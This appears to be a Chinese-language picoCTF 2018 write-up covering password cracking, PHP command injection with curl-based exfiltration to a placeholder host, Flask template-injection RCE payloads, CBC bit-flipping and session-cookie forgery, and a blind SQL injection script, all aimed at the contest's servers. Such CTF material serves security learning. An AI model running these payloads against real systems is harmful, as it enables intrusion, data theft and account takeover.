picoCTF wp

HEEEEEEERE’S Johnny!

给了passwd和shadow文件,就是破解linux用户密码

passwd

1
root:x:0:0:root:/root:/bin/bash

shaodw

1
root:$6$LcvKHioa$67O1HA8Ti.KHeNbD4rE79ZMl1RbiCw4V7eM.r6AURp2wGnapUpXC.VdVB4WGoS2J5eVKP/1MFeMmXIdveJeOS0:17695:0:99999:7:::

用kali自带的john工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~/Desktop/HEEEEEEERE'S Johnny!# john --wordlist=/usr/share/wordlists/rockyou.txt  tocrack
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
thematrix        (root)
1g 0:00:00:18 DONE (2018-10-08 05:24) 0.05488g/s 604.1p/s 604.1c/s 604.1C/s kenya..saavedra
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/HEEEEEEERE'S Johnny!# john --show tocrack
root:thematrix:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left

Aca-Shell-A

根据他的提示一步一步来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
 ~  nc 2018shell1.picoctf.com 33158
Sweet! We have gotten access into the system but we aren't root.
It's some sort of restricted shell! I can't see what you are typing
but I can see your output. I'll be here to help you along.
If you need help, type "echo 'Help Me!'" and I'll see what I can do
There is not much time left!
~/$ ls
blackmail
executables
passwords
photos
secret
~/$ cd secret
Now we are cookin'! Take a look around there and tell me what you find!
~/secret$ ls
intel_1
intel_2
intel_3
intel_4
intel_5
profile_AipieG5Ua9aewei5ieSoh7aph
profile_Xei2uu5suwangohceedaifohs
profile_ahShaighaxahMooshuP1johgo
profile_ahqueith5aekongieP4ahzugi
profile_aik4hah9ilie9foru0Phoaph0
profile_bah9Ech9oa4xaicohphahfaiG
profile_ie7sheiP7su2At2ahw6iRikoe
profile_of0Nee4laith8odaeLachoonu
profile_poh9eij4Choophaweiwev6eev
profile_poo3ipohGohThi9Cohverai7e
Sabatoge them! Get rid of all their intel files!
~/secret$ rm intel_*
Nice! Once they are all gone, I think I can drop you a file of an exploit!
Just type "echo 'Drop it in!' " and we can give it a whirl!
~/secret$ echo 'Drop it in!'
Drop it in!
I placed a file in the executables folder as it looks like the only place we can execute from!
Run the script I wrote to have a little more impact on the system!
~/secret$ cd ..
~/$ cd executables
~/executables$ ls
dontLookHere
~/executables$ ./dontLookHere
 8c4a 2484 feba 76aa 88a7 54be 7cc7 6119 3f6a dfcc 96b4 1a2c 91bc a4b6 8cf1 6942 c3c8 8707 0612 6834 e5e4 347d 3bbf 930c 1cb3
 0992 ad0a a631 5a70 dc88 9311 e6e2 596a 230b 34d9 5fd8 73ed 2fdc a9ee 5833 b7d1 49b1 1fc1 09b8 85e7 4d14 dffb 3b3b 08e2 62db
 96cf 0055 5e5e a90d 0ddf 0a3d 79f6 56d2 7bf0 fb3d 2942 71c4 14a2 2bcd 74d9 c4ca 7f7e f7b6 6688 8cef 9f21 3ad9 d139 cc32 2236
 a3c1 edb5 9d25 576a 46c0 9cdb 9618 a1cd 849d f589 93a5 620a 6d47 e69a 6199 a8ba be23 a532 8e3a 4245 3e34 ac51 98f5 1054 7a95
 72fe 74fa e233 308a 4157 8e87 6736 15f0 eafe 709a ad3a e181 caf0 d939 4ad2 70c9 96de 07b1 9de5 6a45 0707 f9d9 8f3a 1bb5 e8f4
 34f9 eb24 bf8e e80f ca71 115c 9d23 94e2 e05f 3cb6 f5d2 86e9 ea66 c5e0 1d23 45b8 d676 e1e0 b589 a3b9 d929 52ba 177c e4ca b027
 3f07 7247 f5f8 0843 5d6d 46d4 2f5d 3b39 d7fc dc81 36e2 22ee 39b7 949e 94ff 1869 6dea d55e 7e36 afaa 5a96 9ceb ff5d efe5 9b0b
 ad9e 69f0 253b 2874 6eff 27b5 ccbf 1661 2564 f921 1290 725b 49f6 aa7b 4c63 b3e3 9e15 03ab ecd3 9405 d6e5 1bc0 bffd 1633 1382
 6e7d 9726 8e35 aa9c 3632 525a 2b74 c61f 1237 eda6 06ca 3fb5 dd96 0508 228d dcd7 bc48 1429 2e85 627d 360c 8626 a8b4 3f38 df81
 f320 ca26 c0d8 1f5d 40a1 1a6f 74b4 e366 3995 66f1 4617 4b8b 5a15 a1fc 8ec8 81cf 6f5e 6608 20b4 71d8 eec9 95dc 90fc 8a57 6db5
 c87d 19e7 9af2 4c8f 807e c234 924f 4730 178e 3dc8 a6a7 edb9 9d61 8807 12e5 dfb8 e6fd c59d 5a93 c337 1be2 ccf3 f207 cd27 fd72
 449f 5926 55f5 c301 6395 1b58 8607 4c69 a487 de55 55c2 7d74 cfb3 b6ef 6af8 1325 6557 c24b d6f1 2278 519a aadd 2653 776a da11
 e31f ccd1 cc95 1b27 2dde 5b9f f843 3923 17c6 e1d2 3676 3f34 f114 d294 1efd cfaf 8fe5 1d30 4fc2 28fd 324e 21ed d674 42ba d569
 47de 1162 6805 75d5 4173 af3a 463b 08f9 3a75 abdd fe25 3826 718a 275f 5c18 4c81 4b32 3aa6 c93e d9a0 0818 25e3 afed e67e 55d2
 b17c a065 52de 54a4 ee0e 412a 1442 250d 9163 d6d4 5b21 ca0b 1f14 49f7 ecc5 05eb b56a 612f 26d1 3c49 b612 4ad6 4ef6 15c7 836e
 10b8 5888 017d 32b9 3671 aa24 c08f 9cb9 9611 e71d 8a86 eb43 9ef8 a31c ed09 c5ba 51e0 d0b4 f36f 9ffc f806 143e f6b5 d3ce aed2
 1af1 0a8e 9391 7fdb 3cf1 aee2 4af2 778c beb1 cfe8 790b d71c 44aa 6233 a8f0 90eb aeeb c0d2 6d7d a2ff 80e6 4196 e48b 8d92 5392
 4fb5 a3c0 d4d6 34e4 30d2 6a79 bffd cf48 41ef dc34 51f0 8a24 70ea 6406 e9c3 60d3 d7d3 75f3 9df6 56a8 50dc fa2a 60fd d111 eb11
 4f30 d70b 666b 97ab 7c01 9b4e aace 460e 10c3 8a10 23b3 2d31 16a8 569a 1830 f6f7 114f 56da a935 ba59 2786 a1d1 34a6 cbb0 d5a1
 92af 3e3b 045e e499 6ca8 9e50 eb23 320e 329c 1cf3 f2e1 0ab7 00c0 396a c7a9 6d7e 86c0 3374 435c 658b fd80 5b6f d843 bde5 1238
 fcdc ffc9 c3b9 c630 8cf1 cd30 d401 3226 58be d5c7 fd83 d659 8565 4590 c6c0 a4c2 bdfe 8772 835a a59e 03d0 d852 f93c effd 4704
 0210 d63b db1a ae07 6eb2 3938 b944 cbb5 a899 8d4d 6e7d 8cb9 417f d202 fdf5 4ed9 557b a1b1 6d5d af57 c316 9797 571d 19cd b114
 64ca 5b96 05f3 f673 9051 9933 63cc f86c 7f85 f43c 547d c5ab 8b67 58cc bd1c 3cca e234 f4d4 5ed3 0fba f069 9b3e 18bc bc25 9642
 7b4a 18a3 ca80 3666 9e71 6964 fbe8 fb40 db7a 2d22 24b5 3bd2 8ff6 039e 4056 afe5 92fc d9da 3ccf 0f65 ddc1 e1d5 0565 a1e9 bcd4
 d928 cf71 7d04 303b 69a9 44ed ec7c 2e06 0975 5d0a a3af ce0f ac8b 210a ebc7 b3d6 313c c00b 0688 afdb f59c 1e27 8942 06c6 b518
 96ef 0228 f1e0 ad51 481b fc8c 3617 1465 3169 a097 dee6 e821 be68 bc00 73e2 f765 75bb 1d33 b936 1233 80a5 be12 6871 aa81 ff45
 c758 a48b 7e15 b744 ac7c fe9b 4334 ee35 056b f28f 9d15 e0de 4e6a f75b c60a 1de2 172e b8e8 7966 33ff 9f6f 7f55 cf8c 744c 5810
 5649 2b03 a17a c4f4 6a0a 17c8 c7d7 6d28 cb31 8d80 a221 930a 1adc e1d9 ba81 3d3f bba1 abc3 9692 8493 0627 5787 ad6e ce71 278c
 e458 2d27 8b26 2110 c7e1 23a9 cfc1 08f3 7fc4 f699 6683 7f6a 46ef 2410 f489 0d2f 39ff 66e7 9b2e d774 896f 1923 6381 43ae 7ea5
Looking through the text above, I think I have found the password. I am just having trouble with a username.
Oh drats! They are onto us! We could get kicked out soon!
Quick! Print the username to the screen so we can close are backdoor and log into the account directly!
You have to find another way other than echo!
~/executables$ whoami
l33th4x0r
Perfect! One second!
Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.
Try copying the file called TopSecret in tmp directory into the passwords folder.
~/executables$ cp /tmp/TopSecret ~/passwords
: command not found or invalid
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ in tmp directory into the passwords folder.
in: command not found or invalid
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ../passwords
Server shutdown in 10 seconds...
Quick! go read the file before we lose our connection!
~/executables$ cd ..
~/$ cd passwords
~/passwords$ ls
TopSecret
~/passwords$ cat TopSecret
Major General John M. Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.
picoCTF{CrUsHeD_It_9edaa84a}

Client Side is Still Bad

查看页面源码,js里拼接起flag

Logon

只有admin需要验证密码,而判断是否是admin用的cookie,更改cookie为Cookie: admin=True;得到flag

environ

linux的环境变量

env查看所有环境变量

得到SECRET_FLAG=picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}

set查看所有本地定义的环境变量

Secret Agent

提示useragent谷歌可以看

1
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;http://www.google.com/bot.html)

Googlebot是谷歌的网页抓取机器人

you can’t see me

shell登陆后进入/problems/you-can-t-see-me_2_cfb71908d8368e3062423b45959784aa目录

1
2
3
4
5
daolgts@pico-2018-shell-1:/problems/you-can-t-see-me_2_cfb71908d8368e3062423b45959784aa$ ls -al
total 60
drwxr-xr-x   2 root       root        4096 Sep 28 08:29 .
-rw-rw-r--   1 hacksports hacksports    57 Sep 28 08:29 .
drwxr-x--x 576 root       root       53248 Sep 30 03:45 ..

ls -al发现有个文件叫.,不能直接cat读

1
2
3
4
daolgts@pico-2018-shell-1:/problems/you-can-t-see-me_2_cfb71908d8368e3062423b45959784aa$ cat .*
cat: .: Is a directory
picoCTF{j0hn_c3na_paparapaaaaaaa_paparapaaaaaa_093d6aff}
cat: ..: Permission denied

fancy-alive-monitoring

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<html>
<head>
	<title>Monitoring Tool</title>
	<script>
	function check(){
		ip = document.getElementById("ip").value;
		chk = ip.match(/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/);
		if (!chk) {
			alert("Wrong IP format.");
			return false;
		} else {
			document.getElementById("monitor").submit();
		}
	}
	</script>
</head>
<body>
	<h1>Monitoring Tool ver 0.1</h1>
	<form id="monitor" action="index.php" method="post" onsubmit="return false;">
	<p> Input IP address of the target host
	<input id="ip" name="ip" type="text">
	</p>
	<input type="button" value="Go!" onclick="check()">
	</form>
	<hr>

<?php
$ip = $_POST["ip"];
if ($ip) {
	// super fancy regex check!
	if (preg_match('/^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])/',$ip)) {
		exec('ping -c 1 '.$ip, $cmd_result);
		foreach($cmd_result as $str){
			if (strpos($str, '100% packet loss') !== false){
				printf("<h3>Target is NOT alive.</h3>");
				break;
			} else if (strpos($str, ', 0% packet loss') !== false){
				printf("<h3>Target is alive.</h3>");
				break;
			}
		}
	} else {
		echo "Wrong IP Format.";
	}
}
?>
<hr>
<a href="index.txt">index.php source code</a>
</body>
</html>

给出了源码,发现在js和php都验证了ip的合法性,但php中验证ip合法性的正则表达式没有以$结束,即没有指定正则表达式的结束,1.1.1.1aaaaa也是能匹配的,所以存在漏洞

执行命令的结果存在$cmd_result,但没有回显

尝试了反弹shell,没有成功,就用了curl将命令执行的结果带出来

1
2
3
ip=1.1.1.1|curl X.X.X.X?a=`ls |head -n 4|tail -n 1`

ip=1.1.1.1|curl X.X.X.X?a=`cat super-secret-12365-flag.txt |base64`

得到

1
2
3
4
5
SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfOTY2MzlkOTF9Cgo=

解码:

Here is your flag: picoCTF{n3v3r_trust_a_b0x_96639d91}

hertz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
-------------------------------------------------------------------------------
sokeaufx twaw qx yoza ciue - xzvxfqfzfqok_sqrtwax_uaw_xoihuviw_cekhheknlx
-------------------------------------------------------------------------------
xfufwiy, rizlr vzsb lziiqeuk sulw caol ftw xfuqatwun, vwuaqke u vodi oc
iuftwa ok dtqst u lqaaoa ukn u augoa iuy saoxxwn. u ywiiod nawxxqkeeodk,
zkeqaniwn, dux xzxfuqkwn ewkfiy vwtqkn tql ok ftw lqin loakqke uqa. tw
twin ftw vodi uiocf ukn qkfokwn:

-qkfaoqvo un uifuaw nwq.

tuifwn, tw rwwawn nodk ftw nuab dqknqke xfuqax ukn suiiwn ozf souaxwiy:

-solw zr, bqkst! solw zr, yoz cwuaczi jwxzqf!

xoiwlkiy tw sulw coaduan ukn lozkfwn ftw aozkn ezkawxf. tw cuswn uvozf
ukn viwxxwn eauhwiy ftaqsw ftw fodwa, ftw xzaaozknqke iukn ukn ftw
udubqke lozkfuqkx. ftwk, sufstqke xqetf oc xfwrtwk nwnuizx, tw vwkf
foduanx tql ukn lunw aurqn saoxxwx qk ftw uqa, ezaeiqke qk tqx ftaouf
ukn xtubqke tqx twun. xfwrtwk nwnuizx, nqxriwuxwn ukn xiwwry, iwukwn
tqx ualx ok ftw for oc ftw xfuqasuxw ukn ioobwn soiniy uf ftw xtubqke
ezaeiqke cusw ftuf viwxxwn tql, wpzqkw qk qfx iwkeft, ukn uf ftw iqetf
zkfokxzawn tuqa, eauqkwn ukn tzwn iqbw ruiw oub.

vzsb lziiqeuk rwwrwn uk qkxfukf zknwa ftw lqaaoa ukn ftwk sohwawn ftw
vodi xluafiy.

-vusb fo vuaausbx! tw xuqn xfwakiy.

tw unnwn qk u rawustwax fokw:

-coa ftqx, o nwuaiy vwiohwn, qx ftw ewkzqkw staqxfqkw: vony ukn xozi
ukn vioon ukn ozkx. xiod lzxqs, riwuxw. xtzf yoza wywx, ewkfx. okw
lolwkf. u iqffiw faozviw uvozf ftoxw dtqfw soarzxsiwx. xqiwksw, uii.

tw rwwawn xqnwduyx zr ukn euhw u ioke xiod dtqxfiw oc suii, ftwk ruzxwn
udtqiw qk aurf uffwkfqok, tqx whwk dtqfw fwwft eiqxfwkqke twaw ukn ftwaw
dqft eoin roqkfx. stayxoxfolox. fdo xfaoke xtaqii dtqxfiwx ukxdwawn
ftaozet ftw suil.

-ftukbx, oin stur, tw saqwn vaqxbiy. ftuf dqii no kqswiy. xdqfst occ
ftw szaawkf, dqii yoz?

tw xbqrrwn occ ftw ezkawxf ukn ioobwn eauhwiy uf tqx dufstwa, euftwaqke
uvozf tqx iwex ftw iooxw coinx oc tqx eodk. ftw rizlr xtunodwn cusw ukn
xziiwk ohui jodi awsuiiwn u rawiufw, rufaok oc uafx qk ftw lqnniw uewx.
u riwuxukf xlqiw vaobw pzqwfiy ohwa tqx iqrx.

代替密码

in out error

stdin (0), stdout (1), and stderr (2)

1
echo "Please may I have the flag?" | ./in-out-error 1>/dev/null 2>~/flag

store

整数溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Welcome to the Store App V1.0
World's Most Secure Purchasing App

[1] Check Account Balance

[2] Buy Stuff

[3] Exit

 Enter a menu selection
2
Current Auctions
[1] I Can't Believe its not a Flag!
[2] Real Flag
1
Imitation Flags cost 1000 each, how many would you like?
10000000000000000

Your total cost is: -1981284352

Your new balance: 1981285452
Welcome to the Store App V1.0
World's Most Secure Purchasing App

[1] Check Account Balance

[2] Buy Stuff

[3] Exit

 Enter a menu selection
2
Current Auctions
[1] I Can't Believe its not a Flag!
[2] Real Flag
2
A genuine Flag costs 100000 dollars, and we only have 1 in stock
Enter 1 to purchase1
YOUR FLAG IS: picoCTF{numb3r3_4r3nt_s4f3_03054e5d}

Secure Logon

cbc翻转字节攻击

exp1

1
2
3
4
5
6
import base64

cookie = base64.b64decode("4Ol7IYySLlyrKHeIo7UFtoVhkpQ7gmkscYXp8ctZwmroUWhof9YrZYYURyM2TpLze6bO/Vpo40rJ4R1zQXg/yzZe0mUopeHZ+dztZGm51vI=")
flip = ord(cookie[10]) ^ ord("0") ^ ord("1")
newCookie = base64.b64encode(cookie[:10]+chr(flip)+cookie[11:])
print newCookie

exp2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
>>> from pwn import *
>>> import json
>>> cookie = {}
>>> cookie['password'] = 'abcdefgh1111111'
>>> cookie['username'] = 'ab'
>>> cookie['admin'] = 0
>>> json.dumps(cookie, sort_keys=True)
'{"admin": 0, "password": "abcdefgh1111111", "username": "ab"}'
>>> json.dumps(cookie, sort_keys=True).index('0')
10
>>> c = 'ePDqhdXDqtxP/rsO0J11E7DE22lyUv4N1aP7WBSlOOgw0v1TVyYrmxHl278LbuI9jxr0J7NuXlKKSTXl79FFF+E3PQP00TidEtlGpf9W1rQ='.decode('base64')
>>> c = c[:10] + xor(c[10], '0', '1') + c[11:]
>>> c.encode('base64').replace('\n','')
'ePDqhdXDqtxP/roO0J11E7DE22lyUv4N1aP7WBSlOOgw0v1TVyYrmxHl278LbuI9jxr0J7NuXlKKSTXl79FFF+E3PQP00TidEtlGpf9W1rQ='

Flaskcards

题目名字提示flask,想到模板注入

注册登陆之后有Create CardList Cards两个功能

Create Card页面尝试模板注入,然后去List Cards看发现存在模板注入

iJbBAf.png

[].__class__.__bases__[0].__subclasses__()查看类,并没有file类

{{[].__class__.__bases__[0].__subclasses__()[60].__init__.__globals__.__builtins__.__import__('os')}}能得到os模块

{{[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('ls').read()}}执行命令

但是在执行cat app/config.py的时候没有显示

尝试
{{[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen(request.args.cmd).read()}}
url:http://2018shell1.picoctf.com:17012/list_cards?cmd=cat%20app/config.py

得到源码,有flag

1
2
3
4
5
6
7
8
9
10
import os

basedir = os.path.abspath(os.path.dirname(__file__))


class Config(object):
    SECRET_KEY = 'picoCTF{secret_keys_to_the_kingdom_2a7bf92c}'
    #SQLALCHEMY_DATABASE_URI = os.environ.get('DATABSE_URL') or 'sqlite:///'+os.path.join(basedir,'app.db')
    SQLALCHEMY_DATABASE_URI = "sqlite://"
    SQLALCHEMY_TRACK_MODIFICATIONS = False

看了其他的wp,发现一种更简单的方法

flag就是flask中的secret_key,可以不用执行命令或读文件,直接用{{config}}输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Question:<Config {'JSON_AS_ASCII': True, 'SESSION_COOKIE_SECURE': False,
'SQLALCHEMY_BINDS': None, 'MAX_CONTENT_LENGTH': None, 'JSON_SORT_KEYS': True,
'JSONIFY_MIMETYPE': 'application/json', 'BOOTSTRAP_SERVE_LOCAL': False,
'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True,
'PREFERRED_URL_SCHEME': 'http', 'SESSION_COOKIE_PATH': None,
'SQLALCHEMY_NATIVE_UNICODE': None, 'SESSION_COOKIE_DOMAIN': False,
'PROPAGATE_EXCEPTIONS': None, 'APPLICATION_ROOT': '/',
'SQLALCHEMY_COMMIT_ON_TEARDOWN': False, 'MAX_COOKIE_SIZE': 4093,
'SQLALCHEMY_POOL_SIZE': None, 'SESSION_COOKIE_NAME': 'session',
'BOOTSTRAP_QUERYSTRING_REVVING': True, 'PERMANENT_SESSION_LIFETIME':
datetime.timedelta(31), 'EXPLAIN_TEMPLATE_LOADING': False, 'TESTING': False,
'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200),
'BOOTSTRAP_LOCAL_SUBDOMAIN': None, 'ENV': 'production',
'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'TEMPLATES_AUTO_RELOAD': None,
'SQLALCHEMY_RECORD_QUERIES': None, 'USE_X_SENDFILE': False,
'SQLALCHEMY_TRACK_MODIFICATIONS': False, 'TRAP_BAD_REQUEST_ERRORS': None,
'SQLALCHEMY_DATABASE_URI': 'sqlite://', 'BOOTSTRAP_CDN_FORCE_SSL': False,
'SERVER_NAME': None, 'BOOTSTRAP_USE_MINIFIED': True, 'SQLALCHEMY_POOL_TIMEOUT': None,
'SQLALCHEMY_POOL_RECYCLE': None, 'JSONIFY_PRETTYPRINT_REGULAR': False,
'SQLALCHEMY_ECHO': False, 'SESSION_COOKIE_HTTPONLY': True, 'DEBUG': False,
'SQLALCHEMY_MAX_OVERFLOW': None, 'TRAP_HTTP_EXCEPTIONS': False, 'SECRET_KEY':
'picoCTF{secret_keys_to_the_kingdom_2a7bf92c}'}>

Flaskcards Skeleton Key

1
Nice! You found out they were sending the Secret_key: a7a8342f9b41fcb062b13dd1167785f8. Now, can you find a way to log in as admin?

给出了Secret_key,可以伪造成admin

1
2
3
4
5
6
7
8
λ python session_cookie_manager.py decode -c ".eJwlj0tuwzAMRO-idRbmT6RyGYOkRDRI0QJ2uypy97rodgZv8Oan7XWs863dy9_PdWv7Y7Z 7S1wFIhJRlhjBhjCyYlzpZNHC3pmMM0Frk-klzExqQsSbg4maxqARiKC5AV0zNj2oTB0GXB2H8SSaa4l3EXDL4T2sNs92a3ketX99PtfHn4_yLLReA7R7EkrfxJAqQFEic9Jwnn5x3-c6_k_09voFkW0-tg.DqTROA.L9x_aizWtZ_KkPK21n4lQR44XJ8" -s "a7a8342f9b41fcb062b13dd1167785f8"

{u'csrf_token': u'c74df286f9176ac325605823fb1725bccd39a4da', u'_fresh': False, u'user_id': u'6', u'_id': u'c2ef1555bbf8c2bb48219cfb9f15d457f2664384cc17f05daf544437853340a185787b939b2217c0138c28dab3f87a191b934b84d33dee5a6551a8c9a6b8f0ac'}


λ python session_cookie_manager.py encode -s "a7a8342f9b41fcb062b13dd1167785f8" -t "{u'csrf_token': u'c74df286f9176ac325605823fb1725bccd39a4da', u'_fresh': False,u'user_id': u'1', u'_id': u'c2ef1555bbf8c2bb48219cfb9f15d457f2664384cc17f05daf544437853340a185787b939b2217c0138c28dab3f87a191b934b84d33dee5a6551a8c9a6b8f0ac'}"

.eJwlj0tuwzAMRO-idRbmT6RyGYOkRDRI0QJ2uypy97rodgZv8Oan7XWs863dy9_PdWv7Y7Z7S1wFIhJRlhjBhjCyYlzpZNHC3pmMM0Frk-klzExqQsSbg4maxqARiKC5AV0zNj2oTB0GXB2H8SSaa4l3EXDL4T2sNs92a3ketX99PtfHn4_yLLReA7R7EkrfxJAqQFEic9Jwnn5x3-c6_k9Ae_0CkV4-sQ.DqTRyw.cKZSOtvA78vhFcF0OieDLBebCgk
1
2
Welcome Admin
Your flag is: picoCTF{1_id_to_rule_them_all_92303c39}

Flaskcards and Freedom

和第一题一样也是模板注入,可以直接用第一题的payload

1
2
3
{{[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}

picoCTF{R_C_E_wont_let_me_be_85e92c3a}

A Simple Question

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
  include "config.php";
  ini_set('error_reporting', E_ALL);
  ini_set('display_errors', 'On');

  $answer = $_POST["answer"];
  $debug = $_POST["debug"];
  $query = "SELECT * FROM answers WHERE answer='$answer'";
  echo "<pre>";
  echo "SQL query: ", htmlspecialchars($query), "\n";
  echo "</pre>";
?>
<?php
  $con = new SQLite3($database_file);
  $result = $con->query($query);

  $row = $result->fetchArray();
  if($answer == $CANARY)  {
    echo "<h1>Perfect!</h1>";
    echo "<p>Your flag is: $FLAG</p>";
  }
  elseif ($row) {
    echo "<h1>You are so close.</h1>";
  } else {
    echo "<h1>Wrong.</h1>";
  }
?>

存在sql注入,只有You are so close.Wrong两种回显,能进行盲注得出answer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import string

answer = ''
for i in range(100):
  for e in string.printable:
    c = e
    payload = "' or answer GLOB '{}*".format(answer+c)
    # ' OR answer LIKE '
    print payload
    r = requests.post('http://2018shell1.picoctf.com:15987/answer2.php', data = {'answer': payload})
    if 'so close' in r.text:
      print r.text
      answer += c
      print answer
      break

# 41AndSixSixths

Help Me Reset 2

每次刷新页面中的注释<!--Proudly maintained by barboza-->都会变化,结合题目,应该是提示的用户名

只有用户名存在才能重置用户的密码,就用注释中的

reset时会生成session,能进行解密

1
{"current":"carmake","possible":["color","carmake","hero","food"],"right_count":0,"user_data":{" t":["barboza","7362770948",0,"orange","wolverine","Kia","hummus","davis\n"]},"wrong_count":0}

就是三个安全问题的答案,成功重置密码后登陆得到flag